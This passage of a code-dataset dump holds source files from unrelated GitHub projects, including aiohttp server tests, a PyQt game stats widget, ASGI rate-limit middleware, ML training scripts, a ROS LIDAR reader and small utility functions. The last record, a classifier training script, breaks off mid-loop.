assert 10 == srv.keepalive_timeout\n\n\ndef test_keep_alive_timeout_deprecated(make_srv):\n with pytest.warns(DeprecationWarning) as ctx:\n make_srv(keep_alive=10)\n assert len(ctx) == 1\n expected = \"keep_alive is deprecated, use keepalive_timeout instead\"\n assert ctx[0].message.args == (expected,)\n\n\ndef test_keep_alive_timeout_deprecated2(make_srv):\n srv = make_srv(keepalive_timeout=10)\n\n with pytest.warns(DeprecationWarning) as ctx:\n assert 10 == srv.keep_alive_timeout\n assert len(ctx) == 1\n expected = \"Use keepalive_timeout property instead\"\n assert ctx[0].message.args == (expected,)\n\n\ndef test_supports_connect_method(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n with mock.patch.object(srv, 'handle_request') as m_handle_request:\n srv.reader.feed_data(\n b'CONNECT aiohttp.readthedocs.org:80 HTTP/1.0\\r\\n'\n b'Content-Length: 0\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n\n assert m_handle_request.called\n assert m_handle_request.call_args[0] != (mock.ANY, server.EMPTY_PAYLOAD)\n\n\ndef test_content_length_0(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n with mock.patch.object(srv, 'handle_request') as m_handle_request:\n srv.reader.feed_data(\n b'GET / HTTP/1.1\\r\\n'\n b'Host: example.org\\r\\n'\n b'Content-Length: 0\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n\n assert m_handle_request.called\n assert m_handle_request.call_args[0] == (mock.ANY, server.EMPTY_PAYLOAD)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/KeepSafe_aiohttp/aiohttp-master/tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":16883,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"20587746014","text":"import math\n\n# a function that prints the distance between two points\ndef distance(x1, y1, x2, y2):\n diffX = x1 - x2\n diffY = y1 - y2\n\n # square our differences\n diffX **= 2\n diffY **= 2\n\n distance = math.sqrt(diffX + diffY)\n print(\"Distance: \", distance)\n\n# invoke the function\ndistance(10, 2, 1, 1)\ndistance(3, 3, 2, 5)\n\n# given a number or items and price, this\n# function will calculate an order total\n\ndef printOrderTotal(numItems, itemPrice, taxRate):\n subTotal = numItems * itemPrice\n taxesOwed = subTotal * taxRate\n total = subTotal + taxesOwed\n\n total = round(total, 2)\n\n print(\"You owe: $\" + str(total))\n\n# buy three surfboards at $59.99\nprintOrderTotal(3, 59.99, 0.098)\n\n# buy five candles at $5.99\nprintOrderTotal(5, 5.99, 0.098)\n","repo_name":"joshbarcher/IT102_Summer2019","sub_path":"8_functions/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10551345251","text":"import math\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtCore import Qt, QRect, QTimer\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton\n\nclass Stats(QWidget):\n \n def __init__(self, parent=None):\n super().__init__(parent)\n self.setGeometry(QRect(960, 0, 240, 960))\n self.setObjectName(\"stats\")\n\n self.background = QLabel(self)\n self.background.setGeometry(QRect(0, 0, self.width(), self.height()))\n self.background.setStyleSheet(\"background-color: #9e9c89;\")\n \n self.timer_label = QLabel(self)\n self.timer_label.setGeometry(QRect(120, 0, 120, 60))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n 
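# a fixed-width OCR face keeps the MM:SS digits from shifting as the timer updates\n 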
font.setPointSize(24)\n self.timer_label.setFont(font)\n self.timer_label.setAlignment(Qt.AlignCenter)\n self.timer_label.setObjectName(\"timer\")\n self.timer_label.setText(\"00:00\")\n\n self.timer = QTimer(self)\n self.timer.timeout.connect(self.update_timer)\n self.time_counter = 0\n self.is_running = False\n self.control_timer()\n\n self.hp_label = QLabel(self)\n self.hp_label.setGeometry(QRect(10, 80, 50, 25))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n font.setPointSize(18)\n self.hp_label.setFont(font)\n self.hp_label.setObjectName(\"hp_label\")\n self.hp_label.setText(\"HP:\")\n\n self.points_label = QLabel(self)\n self.points_label.setGeometry(QRect(10, 125, 100, 25))\n self.points_label.setFont(font)\n self.points_label.setObjectName(\"points_label\")\n self.points_label.setText(\"Points:\")\n\n self.kills_label = QLabel(self)\n self.kills_label.setGeometry(QRect(10, 170, 90, 25))\n self.kills_label.setFont(font)\n self.kills_label.setObjectName(\"kills_label\")\n self.kills_label.setText(\"Kills:\")\n \n self.weapon_label = QLabel(self)\n self.weapon_label.setGeometry(QRect(10, 215, 100, 25))\n self.weapon_label.setFont(font)\n self.weapon_label.setObjectName(\"weapon_label\")\n self.weapon_label.setText(\"Weapon:\")\n \n self.effects_label = QLabel(self)\n self.effects_label.setGeometry(QRect(10, 280, 110, 25))\n self.effects_label.setFont(font)\n self.effects_label.setObjectName(\"effects_label\")\n self.effects_label.setText(\"Effects:\")\n\n self.hp = QLabel(self)\n self.hp.setGeometry(QRect(0, 100, 240, 25))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n font.setPointSize(18)\n self.hp.setFont(font)\n self.hp.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.hp.setObjectName(\"hp\")\n self.hp.setText(\"100/100\")\n\n self.points = QLabel(self)\n self.points.setGeometry(QRect(100, 145, 130, 25))\n self.points.setFont(font)\n self.points.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.points.setObjectName(\"points\")\n self.points.setText(\"0\")\n\n self.kills = QLabel(self)\n self.kills.setGeometry(QRect(130, 190, 100, 25))\n self.kills.setFont(font)\n self.kills.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.kills.setObjectName(\"kills\")\n self.kills.setText(\"0\")\n\n self.weapon = QLabel(self)\n self.weapon.setGeometry(QRect(50, 235, 180, 25))\n self.weapon.setFont(font)\n self.weapon.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.weapon.setObjectName(\"weapon\")\n self.weapon.setText(\"Dual Pistol\")\n\n self.ammo = QLabel(self)\n self.ammo.setGeometry(QRect(110, 255, 120, 25))\n self.ammo.setFont(font)\n self.ammo.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.ammo.setObjectName(\"ammo\")\n self.ammo.setText(\"0/0\")\n\n self.reload = QLabel(self)\n self.reload.setGeometry(QRect(40, 255, 90, 25))\n self.reload.setFont(font)\n self.reload.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.reload.setObjectName(\"reload\")\n \n self.effect_1 = QLabel(self)\n self.effect_1.setGeometry(QRect(40, 300, 140, 25))\n font = QFont()\n font.setFamily(\"OCR A Extended\")\n font.setPointSize(18)\n self.effect_1.setFont(font)\n self.effect_1.setAccessibleName(\"\")\n self.effect_1.setObjectName(\"effect_1\")\n self.effect_1.setText(\"Slowdown\")\n\n self.effect_1_value = QLabel(self)\n self.effect_1_value.setGeometry(QRect(90, 300, 140, 25))\n self.effect_1_value.setFont(font)\n self.effect_1_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n 
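# right-aligned like the other counters, so the effect values line up in one column\n 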
self.effect_1_value.setObjectName(\"effect_1_value\")\n self.effect_1_value.setText(\"0\")\n\n self.effect_2 = QLabel(self)\n self.effect_2.setGeometry(QRect(40, 320, 140, 25))\n self.effect_2.setFont(font)\n self.effect_2.setObjectName(\"effect_2\")\n self.effect_2.setText(\"Speed-Up\")\n\n self.effect_2_value = QLabel(self)\n self.effect_2_value.setGeometry(QRect(90, 320, 140, 25))\n self.effect_2_value.setFont(font)\n self.effect_2_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_2_value.setObjectName(\"effect_2_value\")\n self.effect_2_value.setText(\"0\")\n\n self.effect_3 = QLabel(self)\n self.effect_3.setGeometry(QRect(40, 340, 140, 25))\n self.effect_3.setFont(font)\n self.effect_3.setObjectName(\"effect_3\")\n self.effect_3.setText(\"Freeze\")\n\n self.effect_3_value = QLabel(self)\n self.effect_3_value.setGeometry(QRect(90, 340, 140, 25))\n self.effect_3_value.setFont(font)\n self.effect_3_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_3_value.setObjectName(\"effect_3_value\")\n self.effect_3_value.setText(\"0\")\n\n self.effect_4 = QLabel(self)\n self.effect_4.setGeometry(QRect(40, 360, 140, 25))\n self.effect_4.setFont(font)\n self.effect_4.setObjectName(\"effect_4\")\n self.effect_4.setText(\"Corrosion\")\n\n self.effect_4_value = QLabel(self)\n self.effect_4_value.setGeometry(QRect(90, 360, 140, 25))\n self.effect_4_value.setFont(font)\n self.effect_4_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_4_value.setObjectName(\"effect_4_value\")\n self.effect_4_value.setText(\"0\")\n \n self.effect_5 = QLabel(self)\n self.effect_5.setGeometry(QRect(40, 380, 140, 25))\n self.effect_5.setFont(font)\n self.effect_5.setObjectName(\"effect_5\")\n self.effect_5.setText(\"Collateral\")\n\n self.effect_5_value = QLabel(self)\n self.effect_5_value.setGeometry(QRect(90, 380, 140, 25))\n self.effect_5_value.setFont(font)\n self.effect_5_value.setAlignment(Qt.AlignRight|Qt.AlignTrailing|Qt.AlignVCenter)\n self.effect_5_value.setObjectName(\"effect_5_value\")\n self.effect_5_value.setText(\"0\")\n\n def control_timer(self):\n if not self.is_running:\n self.is_running = True\n self.timer.start(1000) # Timer will trigger every 1000 ms (1 second)\n else:\n self.is_running = False\n self.timer.stop()\n \n def update_timer(self):\n self.time_counter += 1\n minutes = self.time_counter // 60\n seconds = self.time_counter % 60\n self.timer_label.setText(f\"{minutes:02d}:{seconds:02d}\")\n\n def update_kills(self, kills):\n self.kills.setText(kills.__str__())\n\n def update_points(self, points):\n self.points.setText(points.__str__())\n\n def update_health(self, health, max_health):\n self.hp.setText(f\"{math.ceil(health)}/{math.ceil(max_health)}\")\n\n def update_ammo(self, ammo, max_ammo, reload):\n if reload:\n self.reload.setText(\"Reload\")\n else:\n self.reload.setText(\"\")\n self.ammo.setText(f\"{ammo}/{max_ammo}\")\n\n def update_effects(self, e1, e2, e3, e4, e5):\n self.effect_1_value.setText(f\"{e1}\")\n self.effect_2_value.setText(f\"{e2}\")\n self.effect_3_value.setText(f\"{e3}\")\n self.effect_4_value.setText(f\"{e4}\")\n self.effect_5_value.setText(f\"{e5}\")\n\nif __name__ == \"__main__\":\n import sys\n app = QApplication(sys.argv)\n stats = Stats()\n stats.show()\n 
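# exercise a few update hooks with sample values (hypothetical numbers, not real game state)\n stats.update_health(73, 100)\n stats.update_ammo(5, 12, False)\n 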
sys.exit(app.exec_())\n","repo_name":"Robo-Arena-Team-2-Uni-Tuebingen/Roboarena-Team-2","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":8487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13352770261","text":"import asyncio\nimport re\nfrom typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple\n\nfrom .backends import BaseBackend\nfrom .rule import RULENAMES, Rule\nfrom .types import ASGIApp, Receive, Scope, Send\n\n\ndef _on_blocked(retry_after: int) -> ASGIApp:\n async def default_429(scope: Scope, receive: Receive, send: Send) -> None:\n await send(\n {\n \"type\": \"http.response.start\",\n \"status\": 429,\n \"headers\": [\n (b\"retry-after\", str(retry_after).encode(\"ascii\")),\n ],\n }\n )\n await send({\"type\": \"http.response.body\", \"body\": b\"\", \"more_body\": False})\n\n return default_429\n\n\nclass RateLimitMiddleware:\n \"\"\"\n rate limit middleware\n \"\"\"\n\n def __init__(\n self,\n app: ASGIApp,\n authenticate: Callable[[Scope], Awaitable[Tuple[str, str]]],\n backend: BaseBackend,\n config: Dict[str, Sequence[Rule]],\n *,\n on_auth_error: Optional[Callable[[Exception], Awaitable[ASGIApp]]] = None,\n on_blocked: Callable[[int], ASGIApp] = _on_blocked,\n ) -> None:\n self.app = app\n self.authenticate = authenticate\n self.backend = backend\n\n if not asyncio.iscoroutinefunction(self.authenticate):\n raise ValueError(f\"invalid authenticate function: {self.authenticate}\")\n\n assert isinstance(backend, BaseBackend), f\"invalid backend: {self.backend}\"\n\n self.config: Dict[re.Pattern, Sequence[Rule]] = {\n re.compile(path): value for path, value in config.items()\n }\n\n self.on_auth_error = on_auth_error\n self.on_blocked = on_blocked\n\n async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:\n if scope[\"type\"] != \"http\": # pragma: no cover\n return await self.app(scope, receive, send)\n\n url_path = scope[\"path\"]\n for pattern, rules in self.config.items():\n if not pattern.match(url_path):\n continue\n # After finding the first rule that can match the path,\n # calculate the user ID and group\n try:\n user, group = await self.authenticate(scope)\n except Exception as exc:\n if self.on_auth_error is not None:\n response = await self.on_auth_error(exc)\n return await response(scope, receive, send)\n raise exc\n\n # Select the first rule that can be matched\n method = scope[\"method\"].lower()\n match_rule = list(\n filter(\n lambda r: r.group == group and r.method.lower() in [method, \"*\"],\n rules,\n )\n )\n if match_rule:\n rule = match_rule[0]\n break\n else: # If no rule can match, run `self.app` and return\n return await self.app(scope, receive, send)\n\n if not any(getattr(rule, name) is not None for name in RULENAMES):\n return await self.app(scope, receive, send)\n\n path: str = url_path if rule.zone is None else rule.zone\n retry_after = await self.backend.retry_after(path, user, rule)\n if retry_after == 0:\n return await self.app(scope, receive, send)\n\n return await self.on_blocked(retry_after)(scope, receive, send)\n","repo_name":"abersheeran/asgi-ratelimit","sub_path":"ratelimit/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":244,"dataset":"github-code","pt":"21"} +{"seq_id":"11772360462","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Donny You(youansheng@gmail.com)\n\n\nimport math\nimport numpy as np\nimport 
torch\n\n\nclass PafGenerator(object):\n\n def __init__(self, configer):\n self.configer = configer\n\n def __call__(self, gt_kpts, input_size, maskmap=None):\n input_width, input_height = input_size\n vec_pair = self.configer.get('details', 'limb_seq')\n stride = self.configer.get('network', 'stride')\n theta = self.configer.get('target.paf.theta')\n width, height = input_width // stride, input_height // stride\n accumulate_vec_map = np.zeros((len(vec_pair) * 2, height, width), dtype=np.float32)\n cnt = np.zeros((len(vec_pair), height, width), dtype=np.int32)\n channel, height, width = cnt.shape\n for j in range(len(gt_kpts)):\n for i in range(channel):\n a = vec_pair[i][0] - 1\n b = vec_pair[i][1] - 1\n if gt_kpts[j][a][2] < 0 or gt_kpts[j][b][2] < 0:\n continue\n\n ax = gt_kpts[j][a][0].item() / stride\n ay = gt_kpts[j][a][1].item() / stride\n bx = gt_kpts[j][b][0].item() / stride\n by = gt_kpts[j][b][1].item() / stride\n\n bax = bx - ax\n bay = by - ay\n # 1e-9 to aviod two points have same position.\n norm_ba = math.sqrt(bax * bax + bay * bay)\n if norm_ba == 0:\n continue\n\n bax /= norm_ba\n bay /= norm_ba\n\n min_w = max(int(round(min(ax, bx) - theta)), 0)\n max_w = min(int(round(max(ax, bx) + theta)), width)\n min_h = max(int(round(min(ay, by) - theta)), 0)\n max_h = min(int(round(max(ay, by) + theta)), height)\n\n range_x = list(range(int(min_w), int(max_w), 1))\n range_y = list(range(int(min_h), int(max_h), 1))\n xx, yy = np.meshgrid(range_x, range_y)\n\n xx = xx.astype(np.uint32)\n yy = yy.astype(np.uint32)\n px = xx - ax # the vector from (x,y) to centerA\n py = yy - ay\n limb_width = np.abs(bax * py - bay * px)\n mask = limb_width < theta # mask is 2D\n\n vec_map = np.zeros((2, height, width), dtype=np.float32)\n vec_map[:, yy, xx] = np.repeat(mask[np.newaxis, :, :], 2, axis=0)\n vec_map[:, yy, xx] *= np.array([bax, bay])[:, np.newaxis, np.newaxis]\n\n mask = np.logical_or(np.abs(vec_map[0:1, :, :]) > 0, np.abs(vec_map[1:2, :, :]) > 0)\n\n accumulate_vec_map[2*i:2*i+2, :, :] = np.multiply(accumulate_vec_map[2*i:2*i+2], cnt[i:i+1, :, :])\n accumulate_vec_map[2*i:2*i+2, :, :] += vec_map\n cnt[i:i+1, :, :][mask == 1] += 1\n mask = cnt[i:i+1, :, :] == 0\n cnt[i:i+1, :, :][mask == 1] = 1\n accumulate_vec_map[2*i:2*i+2, :, :] = np.divide(accumulate_vec_map[2*i:2*i+2, :, :], cnt[i:i+1, :, :])\n cnt[i:i+1, :, :][mask == 1] = 0\n\n vecmap = torch.from_numpy(accumulate_vec_map)\n if maskmap is not None:\n vecmap = vecmap * maskmap\n\n return vecmap\n","repo_name":"donnyyou/torchcv","sub_path":"data/pose/utils/paf_generator.py","file_name":"paf_generator.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":2235,"dataset":"github-code","pt":"21"} +{"seq_id":"74121385011","text":"import argparse\nimport yaml\nimport torch\nimport pytorch_lightning as pl\nfrom model.data import IelstDataset, train_val_split\nfrom model.config import get_train_config\nfrom model.model import GPT2Lightning\nfrom model.train import train\n\ndef setup_arg_parser():\n parser = argparse.ArgumentParser('Train')\n parser.add_argument(\"--config\", type=str, \n default=\"config/config.yaml\") \n return parser\n\ndef main(args):\n torch.cuda.empty_cache()\n pl.seed_everything(0)\n \n with open(args.config, 'r') as file:\n config_yaml = yaml.load(file, Loader=yaml.FullLoader)\n config = get_train_config(config_yaml)\n print(config)\n model = GPT2Lightning(config)\n \n dataset = IelstDataset(model.config.data_path,\n max_length=model.config.max_length, 
padding=True)\n assert model.gpt2.get_input_embeddings().num_embeddings == len(dataset.tokenizer)\n train_set, val_set = train_val_split(dataset, 0.9)\n \n train(model, train_set, val_set)\n \nif __name__==\"__main__\":\n arg_parser = setup_arg_parser()\n args = arg_parser.parse_args()\n main(args)","repo_name":"XuanVuNguyen/ielts_writer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21846356662","text":"# view.py\r\n# By: BentoBot02\r\n# karuta catalog view command\r\n\r\nimport discord\r\nimport os\r\nfrom discord.ext import commands\r\nfrom copy import deepcopy\r\n\r\nimport globalValues\r\n\r\nasync def view(ctx, args):\r\n\r\n if len(args) < 1:\r\n await ctx.channel.send(\"<@\" + str(ctx.author.id) + \">, please input a card code.\")\r\n return\r\n\r\n code = args[0]\r\n code = code.lower()\r\n\r\n \r\n card = await globalValues.catalog.getLiveCatalogCard(code)\r\n\r\n if card == None:\r\n await ctx.channel.send(\"<@\" + str(ctx.author.id) + \">, that card is not in the catalog.\")\r\n return\r\n\r\n descriptionStr = card.getViewStr()\r\n preferredPaymentStr = card.getPaymentStr()\r\n\r\n embedVar = discord.Embed(title=\"Card Details\", description=descriptionStr, color=0x6280D1)\r\n embedVar.add_field(name=\"Preferred Payment:\", value=preferredPaymentStr)\r\n embedVar.set_image(url=card.getImageURL())\r\n await ctx.channel.send(embed=embedVar)","repo_name":"BentoBot02/Karuta-Catalog","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35196076157","text":"# Function to compute features for synapse detection.\n#\n# **Inputs**\n#\n# em: (uint8)\n# - Matrix containing the raw EM dataset of interest.\n#\n# idxToTest: (uint32)\n# - Vector containing a list of linear indices to use in feature extraction and downstream classification.\n#\n# vesicles: (string)\n# - Location of mat file containing a RAMONVolume named cube. 
The cube contains a binary mask indicating locations of putative neurotransmitter-containing vesicles.\n#\n# **Outputs**\n#\n# xt: (float)\n# - Matrix (NxD) containing features for N idxToTest datapoints and D features.\n#\n\nimport numpy as np\nfrom scipy import ndimage\n\ndef vesiclerf_feats(em):\n #return value\n xt = [] \n num_features = 2\n\n # Kernels\n B0 = np.ones([5,5,1])/(5*5*1)\n B1 = np.ones([15,15,3])/(15*15*3)\n B2 = np.ones([25,25,5])/(25*25*5)\n\n ### Intensity Feats ###\n # find weighted average of features\n I0 = ndimage.convolve(em,B0,mode='constant')\n I2 = ndimage.convolve(em,B1,mode='constant')\n\n # NOTE: B2 and I0 are computed but currently unused; only the 15x15x3 mean-intensity feature is returned\n # reshape data\n # I0 = [np.reshape(I0,(I0.size,1)).tolist(), num_features]\n # I2 = [np.reshape(I2,(I2.size,1)).tolist(), num_features]\n # I0 = np.reshape(I0,(I0.size,1))\n I2 = np.reshape(I2,(I2.size,1))\n xt = I2\n #xt.append(I0)\n #xt.append(I2)\n\n return xt","repo_name":"Connectomics-Classes/team-awesome","sub_path":"vesiclerf_feats.py","file_name":"vesiclerf_feats.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15926529981","text":"# Defining a Function\r\n\r\ndef lex(series, n, ini='', seq=None):\r\n # default to None: a shared mutable default list would accumulate results across calls\r\n if seq is None:\r\n seq = []\r\n if n == 0:\r\n seq.append(ini)\r\n else:\r\n for c in series:\r\n lex(series, n - 1, ini + c, seq)\r\n return seq\r\n\r\n# Run\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n D = open('rosalind_lexf.txt').read()\r\n Data = D.split()\r\n series = Data[:-1]\r\n n = int(Data[-1])\r\n\r\n for i in lex(series, n):\r\n print(i)\r\n\r\n","repo_name":"Mockingbird2k/BioInformatic-Assignments","sub_path":"BioInformatic Assignments (Rosalind)/Enumerating k-mers Lexicographically (lexf).py","file_name":"Enumerating k-mers Lexicographically (lexf).py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33687559030","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass FocalLoss(nn.Module):\n \"Focal loss implemented using F.cross_entropy\"\n def __init__(self, gamma: float = 2.0, weight=None, reduction: str = 'mean') -> None:\n super().__init__()\n self.gamma = gamma\n self.weight = weight\n self.reduction = reduction\n\n\n def forward(self, inp: torch.Tensor, targ: torch.Tensor):\n ce_loss = F.cross_entropy(inp, targ, weight=self.weight, reduction=\"none\")\n p_t = torch.exp(-ce_loss)\n loss = (1 - p_t)**self.gamma * ce_loss\n if self.reduction == \"mean\":\n loss = loss.mean()\n elif self.reduction == \"sum\":\n loss = loss.sum()\n return loss\n\nif __name__ == \"__main__\":\n print()","repo_name":"LucaRom/deep_mh","sub_path":"custom_loss.py","file_name":"custom_loss.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11905956451","text":"# This script processes our LIDAR data\nimport rospy\nfrom sensor_msgs.msg import LaserScan\n \n# This function takes the LIDAR data and makes sense of it\ndef lidar_data(veri):\n\n # to make sense of the data we created a dictionary named areas\n # we added a jpg file to the project that shows how the areas map to these degree ranges\n areas = {\n 'front1': min(min(veri.ranges[0:9]), 3.5),\n 'front2': min(min(veri.ranges[349:359]), 3.5),\n 'front_left': min(min(veri.ranges[10:49]), 3.5),\n 'left': min(min(veri.ranges[50:89]), 3.5),\n 'back': min(min(veri.ranges[90:268]), 3.5),\n 'right': 
min(min(veri.ranges[269:308]), 3.5),\n 'front_right': min(min(veri.ranges[309:348]), 3.5),\n }\n \n print(areas)\n \n# In this main block we initialize our node, named tb3_lidar\nif __name__ == '__main__':\n \n rospy.init_node('tb3_lidar',anonymous=True)\n \n# To get the LIDAR data we subscribe to the /scan topic\n rospy.Subscriber('/scan', LaserScan, lidar_data)\n# We use a callback, so we call spin to keep the node alive\n rospy.spin()\n","repo_name":"kaanoztekin99/turtlebot3_Line_Tracking","sub_path":"scripts/tb3_lidar.py","file_name":"tb3_lidar.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25135968335","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom esmigrate.commons import local_config_file_path, user_config_file_path\nfrom esmigrate.contexts import ContextConfig\nfrom esmigrate.exceptions import (\n    InvalidSchemaPatternError,\n    UserProfileNotFoundError,\n)\n\n\ndef test_context_fails_with_invalid_schema_pattern_error(monkeypatch):\n    \"\"\"Test fails if ContextConfig can be instantiated with invalid pattern set via env variable\"\"\"\n    monkeypatch.setenv(\"SCHEMA_PATTERN\", \"some illegal pattern\")\n    with pytest.raises(InvalidSchemaPatternError):\n        ContextConfig()\n\n\ndef test_context_fails_with_user_profile_not_found_error():\n    \"\"\"Test fails if requested profile is not available in any configuration file\"\"\"\n    with pytest.raises(UserProfileNotFoundError):\n        ContextConfig().load_for(\"some-profile\")\n\n\ndef test_context_silently_skips_invalid_json_in_load_order(monkeypatch, fs):\n    \"\"\"Test fails if context loader cannot load configuration files silently in order\"\"\"\n    monkeypatch.setenv(\"ESMIGRATE_CONFIG\", \"/tmp/elastic-migrate/config.json\")\n    fs.create_file(\"/tmp/elastic-migrate/config.json\", contents=\"\"\"not a json\"\"\")\n    fs.create_file(\n        user_config_file_path,\n        contents=\"\"\"{\"profiles\":[{\"test\":{\"schema_ext\": \".exm1\", \"schema_dir\": \"dir1\"}}]}\"\"\",\n    )\n    fs.create_file(\n        local_config_file_path,\n        contents=\"\"\"{\"profiles\":[{\"test\":{\"schema_ext\": \".exm2\", \"elastic_host\": \"http://127.0.0.1:9200\"}}]}\"\"\",\n    )\n    context = ContextConfig().load_for(\"test\")\n    assert context.profile == \"test\"\n    assert context.schema_dir == \"dir1\"\n    assert context.schema_ext == \".exm2\"\n    assert context.es_host == \"http://127.0.0.1:9200\"\n","repo_name":"zobayer1/elastic-migrate","sub_path":"tests/test_contexts/test_context_config.py","file_name":"test_context_config.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"37927916241","text":"# metal_binding_classifier\n\nimport os\n#os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n\n#import the tools\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data import DataLoader, WeightedRandomSampler\nfrom torch.utils.data import RandomSampler, SequentialSampler\nimport torchvision\nfrom torchvision import datasets, transforms\nimport torchmetrics as metrics\nimport random\nimport time\nimport datetime\n\nfrom PIL import Image\nimport pandas as pd\nimport numpy as np\n\n##------ nets ----------------------------\nfrom .models import alphafold\n\n##------ dataset -------------------------\nfrom .metal_binding_classifier import *\n\nimport 
statistics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import classification_report, roc_auc_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\n\n# set up paths (update your paths here)\n\n# PROJ_PATH = '/home/ybwu/projects/Protein/testing/mbc/'\n# DATA_PATH = PROJ_PATH + 'input/'\n# out_dir = '/home/ybwu/projects/Protein/testing/mbc/Aug1221_AF1/'\n\n#BATCH_SIZE = 16\n#EPOCHS = 20\n\ndef train_model(foldno, train_df, valid_df, DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20):\n \n #Sample weight\n from collections import Counter\n y_train = train_df.label.values.astype(int)\n count=Counter(y_train)\n class_count=np.array([count[0],count[1]])\n weight=1./class_count\n weight=weight/sum(weight)\n print(\"class weight:\", weight)\n #weight = [1.0, 1.0]\n \n #samples_weight = np.array([weight[t] for t in y_train])\n #samples_weight=torch.from_numpy(samples_weight)\n #sampler = WeightedRandomSampler(samples_weight, len(samples_weight))\n \n # Create datasets and dataloaders\n train_set = image_set(train_df, DATA_PATH, mode='train')\n train_loader = DataLoader(\n train_set, \n sampler = RandomSampler(train_set),\n batch_size = BATCH_SIZE,\n drop_last = True, \n # shuffle = True,\n pin_memory=True,\n num_workers = BATCH_SIZE)\n \n valid_set = image_set(valid_df, DATA_PATH, mode='valid')\n valid_loader = DataLoader(\n valid_set,\n sampler = SequentialSampler(valid_set), \n batch_size = BATCH_SIZE, \n drop_last = False,\n # shuffle=False,\n pin_memory=True,\n num_workers = BATCH_SIZE)\n \n print(\"len of train_loader:\", len(train_loader))\n print(\"len of valid_loader:\", len(valid_loader))\n\n # Setting up GPU\n #device = torch.device('cuda:0' if torch.cuda.is_available else 'cpu')\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n # build the model\n model = alphafold.AlphafoldNet()\n model= model.to(device)\n \n # cost_function\n cost_function = nn.BCELoss() \n \n # optimizer\n optimizer = optim.Adam([param for param in model.parameters() if param.requires_grad],lr=0.0001)\n \n # learning rate scheduler\n #exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=10, gamma=0.01)\n num_epochs=EPOCHS\n \n iter_valid = 20 # every 10 batch\n iteration4train = 5 # only for 5 of train batches\n iteration_counted = 10000\n \n min_loss = 1000\n \n start_time = time.time()\n iteration = 0\n for epoch in range(num_epochs):\n # epoch start\n print('-'*20)\n print('Start training {}/{}'.format(epoch+1,num_epochs))\n print('-'*20)\n \n # Start Training model\n model.train()\n \n for x,y in train_loader:\n # Clear the grad\n optimizer.zero_grad()\n \n # Put x and y to GPU and get predictions\n x,y = x.to(device),y.to(device)\n outputs = model(x)\n \n # Store the loss\n loss = cost_function(outputs,y.type_as(outputs))\n \n # count and update gradients\n loss.backward()\n optimizer.step()\n 